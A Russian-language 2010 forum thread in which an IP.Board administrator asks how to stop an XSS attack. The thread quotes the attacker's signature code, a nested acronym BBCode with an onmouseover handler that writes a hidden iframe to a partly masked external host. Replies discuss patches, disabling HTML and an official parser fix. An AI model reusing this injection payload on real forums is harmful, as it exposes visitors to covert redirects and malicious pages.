fagediba 0 03/07/2010 09:23 AM (edited) Есть форум ipb один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код [color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color] вот как работает тег акронима:[acronym='Laugh Out Loud']lol[/acronym] <acronym title='{option}'>{content}</acronym> Как защититься и что делать? тема обсуждается тутhttp://ipbskins.ru/forum/topic5228.htmlhttp://forum.searchengines.ru/showthread.php?p=6476617http://forum.antichat.ru/showthread.php?p=1960546http://forums.ibresource.ru/index.php?showtopic=60138 Edited March 7, 2010 by fagediba Share this post Link to post
Ph-A 395 03/07/2010 10:51 AM Есть форум ipbIP.Board версия: 1.x ? Как защититься и что делать?1. Использовать не ломанную версию форума со всеми патчами безопасности. 2. Разрешить HTML в сообщениях?Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности. 3. Разрешить HTML в подписи?Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись. Share this post Link to post
fagediba 0 03/07/2010 10:55 AM 236 форум, хтмл теги атакующий не использовал Share this post Link to post
fagediba 0 03/07/2010 11:37 AM Атакующий скрыл подпись под цвет фонаcolor="#EEF2F7" Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.? Тогда левые скрипты на странице хотя бы будут видны Share this post Link to post
Ph-A 395 03/07/2010 12:28 PM тема обсуждается тутСмысл так плодить тему.... К тому, что написал Ritsuka, добавить нечего. + жалоба в freehostia.com Share this post Link to post
fagediba 0 03/07/2010 12:53 PM > К тому, что написал Ritsuka, добавить нечего. ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера Share this post Link to post
fagediba 0 03/07/2010 05:48 PM Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать http://forums.ibresource.ru/index.php?showtopic=60138 вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает Share this post Link to post
Ph-A 395 03/07/2010 06:08 PM Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.Угу. вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезаетРазместил (ОН). Я читал молча, добавить было нечего Share this post Link to post
fagediba 0 03/08/2010 03:55 PM (edited) Официальный фикс xss с акронимом в 2.3.6 Изменения sources/classes/bbcode/class_bbcode_core.php Edited March 8, 2010 by Ph-A Код битый, нельзя использовать Share this post Link to post
Ph-A 395 03/08/2010 04:59 PM Официальный фикс xss с акронимом в 2.3.6Arhar на ibresource его раскритиковал. И привел другое решениеhttp://forums.ibresource.ru/index.php?s=&a...st&p=363021 Share this post Link to post
